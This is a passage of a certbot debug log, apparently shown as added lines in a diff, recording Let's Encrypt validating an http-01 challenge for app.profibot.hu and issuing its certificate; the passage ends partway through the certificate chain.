"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bVk1SDZqRHJQUHhlb2N5VVdQRnRGWGdSLVpPZ3UydUgwMlZCOWpMSkhkYkkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "D9D_P7RIHR-lsswIj3g1bsCgwJ0mwj3wyxswBADZBAmKOh0WXY7-d-DzfymzpS5sIIzzOZ6_WtQR80UravVyxcFtyIS2cPTZ6SD_5IekZlyVcalzae7gOClYSvG5DrhwcSp3UhU_3qINxxQLetOz0AsNvNXDPnQx2EuLbOWHT_YciNB1RFXPuQtJUnj-ioIC1uWYPcTBag_xgFJ_qF3eV-reMnQ9ZEsFjYBVvs5dY4Ug-yj_twdL0f1OnYEpoumrNYyQHecRjtaCPgfeCBn5GSozRbNxV3ZgsD7tBjmjvzrEYbkSuc190_-nEQEvIQ3-spTqUEJpqBh7PEe585Fo5g", + "payload": "" +} +2026-01-20 19:15:13,712:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:13,713:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:13 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymvEiAzP8bgbuPqEaUJ2RiSjZUFdY38FJZmQAMMkkAdF0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:13,713:DEBUG:acme.client:Storing nonce: l5FKN_ymvEiAzP8bgbuPqEaUJ2RiSjZUFdY38FJZmQAMMkkAdF0 +2026-01-20 19:15:13,714:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:16,715:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:16,719:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bXZFaUF6UDhiZ2J1UHFFYVVKMlJpU2paVUZkWTM4RkpabVFBTU1ra0FkRjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "X9zNrqr0xylTsyk1gXf2oWR0lJ5mtcbXsk_i7Hj9uuXshMFytxJs5bx2raIX5oTbUIDAkBNY6h3QfH0KbLQ5mOAkLSUutpCHU8QP-Cs0XAHum5w4DF_ho96WhZrqfDySRKkfuG1yZ-BZyBxcnoHxrZe7uC5936DQjOIF23UEFU_jg96JVeCvQWdPSIXIoHadCchSSTipjKttCM8-zKZ8VxT3Vy6d5J2WdI-BSAYOC7oUSrUJZWESdnQpDh3J6cOA7Qa4ONwNBDY3RSZs2HMmTsJUQVZQSI2pSe5hQ24n4kXrYJi-2RKIugKB5MGLthVAxUtLLKexawmQIIZFGm0coA", + "payload": "" +} +2026-01-20 19:15:16,875:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:16,876:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:16 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymKJpeQ_qErX7Uwngtp3IQPnK6C2An-_qsplPv-upjFbw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:16,877:DEBUG:acme.client:Storing nonce: l5FKN_ymKJpeQ_qErX7Uwngtp3IQPnK6C2An-_qsplPv-upjFbw +2026-01-20 19:15:16,877:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:19,878:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:19,882:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bUtKcGVRX3FFclg3VXduZ3RwM0lRUG5LNkMyQW4tX3FzcGxQdi11cGpGYnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "iZHzfgSZAg4tdpEW5ymXQhj10m7VZDaySzVmAEbupL_DjNTMFmUQFqxirC-sC2VR5LBNZxx7i1rULAXBWwbYofYISQ_QfZr04o_Lb3Faow1CoM8FVNDYGikmYGGrJ9LvaXK_-Oxw7-CE24Woj3fSK5OmoStAZdbXLIBUDsh-nE3rNnZinHbNuWRICwdksK5NelYqu79i4sj65_8cdoAoPYj706GP_HAM7rl5dPd3Sz70rxyEHCdTl19JoRy5db-ee7ZxDB5OAfSRgo9LfNfYOOIvDbDkcGGrbQjIxIOzbTGEYx2dJwkqgMq1uchpHEpNbda6v3xSp_f6lk_6qifm8Q", + "payload": "" +} +2026-01-20 19:15:20,039:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:20,040:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:19 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYQEtB0gLQdlswjfsqg8MEkWFF9AlvsZHA9Xd5fmQZTBI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:20,041:DEBUG:acme.client:Storing nonce: 82ktJIqYQEtB0gLQdlswjfsqg8MEkWFF9AlvsZHA9Xd5fmQZTBI +2026-01-20 19:15:20,041:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:23,042:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:23,046:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWVFFdEIwZ0xRZGxzd2pmc3FnOE1Fa1dGRjlBbHZzWkhBOVhkNWZtUVpUQkkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "RuSShWCoPPzGdijpZeTg_3RVmy9aUbMKa5f9J9B-_QLEKNhTJjOD3vKO7cmgL5UnG3wmbvQmsySxrpw1fP8pgr6QqvnwfgOJzpcNRR1PxFW4KDU1NzW1uvYOmfEo02NT1ZOXD6i_fPZ5wXbjOpxY4cZUlLTKXlZOPpFTvME32e1Ta6WSZBsFThysaHKi-2hnwx7tbcSm4AfwsWpcIrevHr1f0OXWMpyVsdelosHQKgIYxSm1b51R_LT5_C3dnUyGfle7oU9bgpajxQ_LhvKo1fFUHbna8nbWoWybOhuBrSKc6D09OCyLYarwk8TRcONeG_MEpkux-feMPouWT1vVLw", + "payload": "" +} +2026-01-20 19:15:23,202:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 766 +2026-01-20 19:15:23,203:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:23 GMT +Content-Type: application/json +Content-Length: 766 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYchXvfx-8ZdYjGWvoUimycbrjwRQoLZPjWMGIxyqUawo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "valid", + "expires": "2026-02-19T19:15:22Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "valid", + "validated": "2026-01-20T19:14:21Z", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4", + "validationRecord": [ + { + "url": "http://app.profibot.hu/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4", + "hostname": "app.profibot.hu", + "port": "80", + "addressesResolved": [ + "91.82.83.208" + ], + "addressUsed": "91.82.83.208" + } + ] + } + ] +} +2026-01-20 19:15:23,203:DEBUG:acme.client:Storing nonce: 82ktJIqYchXvfx-8ZdYjGWvoUimycbrjwRQoLZPjWMGIxyqUawo +2026-01-20 19:15:23,204:DEBUG:certbot._internal.error_handler:Calling registered functions +2026-01-20 19:15:23,204:INFO:certbot._internal.auth_handler:Cleaning up challenges +2026-01-20 19:15:23,204:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4 +2026-01-20 19:15:23,205:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2026-01-20 19:15:23,205:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJTCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEZGwMOAMHvkR1cjgc\noFSZmH2dYDlX6lskI2tDBjyQo7qYCrLo4RSuMuSPQSZSNWIMNjiPNRWVINfNxRie\n05WXSJ2+iVVG3reaqOp9YTORqI7qj76hn0ugjrED1M+eM0dRoC0wKwYJKoZIhvcN\nAQkOMR4wHDAaBgNVHREEEzARgg9hcHAucHJvZmlib3QuaHUwCgYIKoZIzj0EAwID\naAAwZQIxAMczJ1wthg+/NhP/kMZ9b0xKER4TwQh0dIeXun5lyO3hYNVQrYvnfWIZ\nGRbJURqcUAIwZkQ1ae9z+9WjSzW9rLYYoHhLatP8ss+H/36qCgNcnL5zI1i3XJ3l\n/nDyVZRiFDyy\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2026-01-20 19:15:23,206:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-01-20 19:16:53.206363 +2026-01-20 19:15:23,207:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBJTCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEZGwMOAMHvkR1cjgcoFSZmH2dYDlX6lskI2tDBjyQo7qYCrLo4RSuMuSPQSZSNWIMNjiPNRWVINfNxRie05WXSJ2-iVVG3reaqOp9YTORqI7qj76hn0ugjrED1M-eM0dRoC0wKwYJKoZIhvcNAQkOMR4wHDAaBgNVHREEEzARgg9hcHAucHJvZmlib3QuaHUwCgYIKoZIzj0EAwIDaAAwZQIxAMczJ1wthg-_NhP_kMZ9b0xKER4TwQh0dIeXun5lyO3hYNVQrYvnfWIZGRbJURqcUAIwZkQ1ae9z-9WjSzW9rLYYoHhLatP8ss-H_36qCgNcnL5zI1i3XJ3l_nDyVZRiFDyy"\n}' +2026-01-20 19:15:23,210:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471639170836: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWWNoWHZmeC04WmRZakdXdm9VaW15Y2JyandSUW9MWlBqV01HSXh5cVVhd28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDcxNjM5MTcwODM2In0", + "signature": "hWQdhPfQfdXaM3Ocyoi7_JvPutVZrB5IdxiuGZYVWdf_LDwoqbGUJaUsHveYXmNIG8ux24DU7JEtFUzskSRZ4bYwrkya2PKnhrg9rtEZKw8p0lDulVskL7ex3kCT9NGB6AeW8aXL_tFjUT43mhkxaANMRgyMkfr9RyikZKQ2W3UY0XPk0M500G8mzg-zd3RPqs3_MWybgCub3LufATi4WJuBHonvLrn8_1pMJGgQ1KhrjDFVef0R-0c7OL-_Z5P7q6p_YRuOrMpc8l4Dl9hfTizt3rX80rzcSSMKaai_pwAm548BBW8I37FFVS2MIiLZNxZKnvmf7Fy21Wu_bqsc0w", + "payload": "ewogICJjc3IiOiAiTUlJQkpUQ0JyQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFWkd3TU9BTUh2a1IxY2pnY29GU1ptSDJkWURsWDZsc2tJMnREQmp5UW83cVlDckxvNFJTdU11U1BRU1pTTldJTU5qaVBOUldWSU5mTnhSaWUwNVdYU0oyLWlWVkczcmVhcU9wOVlUT1JxSTdxajc2aG4wdWdqckVEMU0tZU0wZFJvQzB3S3dZSktvWklodmNOQVFrT01SNHdIREFhQmdOVkhSRUVFekFSZ2c5aGNIQXVjSEp2Wm1saWIzUXVhSFV3Q2dZSUtvWkl6ajBFQXdJRGFBQXdaUUl4QU1jekoxd3RoZy1fTmhQX2tNWjliMHhLRVI0VHdRaDBkSWVYdW41bHlPM2hZTlZRcll2bmZXSVpHUmJKVVJxY1VBSXdaa1ExYWU5ei05V2pTelc5ckxZWW9IaExhdFA4c3MtSF8zNnFDZ05jbkw1ekkxaTNYSjNsX25EeVZaUmlGRHl5Igp9" +} +2026-01-20 19:15:24,088:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/471639170836 HTTP/1.1" 200 451 +2026-01-20 19:15:24,089:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:24 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471639170836 +Replay-Nonce: 82ktJIqYWKF1imDf5QfsGjMuSz39epZQoKb_7B5WCV4_mOB9wRM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-27T19:14:21Z", + "identifiers": [ + { + "type": "dns", + "value": "app.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471639170836", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/05608df76fdab2efa09d5f63616fa5d3efd1" +} +2026-01-20 19:15:24,089:DEBUG:acme.client:Storing nonce: 82ktJIqYWKF1imDf5QfsGjMuSz39epZQoKb_7B5WCV4_mOB9wRM +2026-01-20 19:15:25,090:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:25,094:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471639170836: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWVdLRjFpbURmNVFmc0dqTXVTejM5ZXBaUW9LYl83QjVXQ1Y0X21PQjl3Uk0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDcxNjM5MTcwODM2In0", + "signature": "kY2ZUn0jt4SLBYGNRLwUMUps5sK8qz72cUUfxnUNIfrqkDznTLbDzHb14zM2AbSo3R3yWcmRc_5jdnXa2-71MQkHzcBdewPkMcruKNsQ2_Fu4F1eB9iSHcgd7W5Bs3iC30lEvCC7dqMO8hdaE5Lw9YuhPSqk_dsJOwC7Y5t4qC-glVk7ix4sFI5m3N3nWfEcp3OChOw80IGWBAKLRdjXcTa_efwCb8Qhoz1jd-rEpFrpNKcBaMH_3zHQvQa72fD5GhpK8pqhcBxh2G0CYgShpjlOjqqoGkS9Q3ktRAL_KlnYOVlyihN8_b_s6I2Z1OIty59Qj0smqARG97F5U0KNcg", + "payload": "" +} +2026-01-20 19:15:25,298:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/471639170836 HTTP/1.1" 200 451 +2026-01-20 19:15:25,299:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:25 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471639170836 +Replay-Nonce: 82ktJIqYi-fH5JorUIDUVgTLTcmduUIhOoMGfRgtsw8DghuvTbQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-27T19:14:21Z", + "identifiers": [ + { + "type": "dns", + "value": "app.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471639170836", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/05608df76fdab2efa09d5f63616fa5d3efd1" +} +2026-01-20 19:15:25,299:DEBUG:acme.client:Storing nonce: 82ktJIqYi-fH5JorUIDUVgTLTcmduUIhOoMGfRgtsw8DghuvTbQ +2026-01-20 19:15:25,300:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:25,304:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/05608df76fdab2efa09d5f63616fa5d3efd1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWWktZkg1Sm9yVUlEVVZnVExUY21kdVVJaE9vTUdmUmd0c3c4RGdodXZUYlEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU2MDhkZjc2ZmRhYjJlZmEwOWQ1ZjYzNjE2ZmE1ZDNlZmQxIn0", + "signature": "UiPdPmkqNKm7uyhWj0bPbillZ4eMrX3liw1sje9CpAEowjkbzs5Do9m5StjeOHj02X8dzx5HyNcb4nJ8RnCXo5dmKp4byDWExlmdqCjSGPwwote5kb0HZU0KvAG8ZiKNViThooPKNTtnIIPjUrhK_Em3PGSL4P_yQAn34EKL_5gLRhOcbNFzewhFH3y2c-7FEzvUqfD1A4xYSh1Wc4FFlcSSVwG5Jyjdu7N6TOliED3NDFFqcUryNKFDjoEGzR3RcGQhpnlioxgfOnuV6dV54s9awhmM7xxuO99I7H75MJUCEMcRLaPb2xxXMBf3zjQNGapmjbPZQK3oe9dNuDj5eQ", + "payload": "" +} +2026-01-20 19:15:25,462:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/05608df76fdab2efa09d5f63616fa5d3efd1 HTTP/1.1" 200 2905 +2026-01-20 19:15:25,463:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:25 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2905 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: 82ktJIqY7eHcOaEYq3LR7Qbjp8jYDiH5Bm8elffdu5sD3Y94hXE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDsDCCAzWgAwIBAgISBWCN92/asu+gnV9jYW+l0+/RMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNjAxMjAxODE2NTNaFw0yNjA0MjAxODE2NTJaMBoxGDAWBgNVBAMTD2Fw +cC5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABGRsDDgDB75EdXI4 +HKBUmZh9nWA5V+pbJCNrQwY8kKO6mAqy6OEUrjLkj0EmUjViDDY4jzUVlSDXzcUY +ntOVl0idvolVRt63mqjqfWEzkaiO6o++oZ9LoI6xA9TPnjNHUaOCAiQwggIgMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUyhEHvbW74UVUb1a6U64Puwn69SEwHwYDVR0j +BBgwFoAUjw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTguaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2FwcC5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTguYy5sZW5jci5vcmcvODIuY3JsMIIBCwYKKwYBBAHWeQIEAgSB +/ASB+QD3AHUAZBHEbKQS7KeJHKICLgC8q08oB9QeNSer6v7VA8l9zfAAAAGb3NVG +SwAABAMARjBEAiAP1scwpg3dQFPK+PE5MdgOhZYW4O1NxisOvuWdefHsjQIgQT/M +lQx83aa2liIP+TPphetJNB5+p43RgzGl0tKEs3kAfgClyXiSXVdGF4KHDdiJZgtc +VWSLfQBA8uwHaFHRiGkZ9wAAAZvc1Ug2AAgAAAUAL5Y8sQQDAEcwRQIhAMGCBlb/ +fDzI+IgB5zdMs5Wgfgy95SYDZA5wSzE7/HywAiAybIZk62+BKZDX23jE3njqO3sc +JcfNJHk/ypU6jk8+SjAKBggqhkjOPQQDAwNpADBmAjEA9aw+nmK+Do52PRWB/voM +JkrNKZbVULDAoXymwPysX60k7DQqTlgvne2Dg//JaiaTAjEA9lAEXUH+b+clBJi8 +2w2u4feHtxqmDpEHVRwBsD427CjO1qM5YaOA8bcyh7Gmiamz +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy +Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa +Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF +bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c +S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb +R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB +9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB +MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j +cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB +BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE +DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j +ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 +RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d +AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 +otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA +aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm +Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 +HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 +Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR +xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d 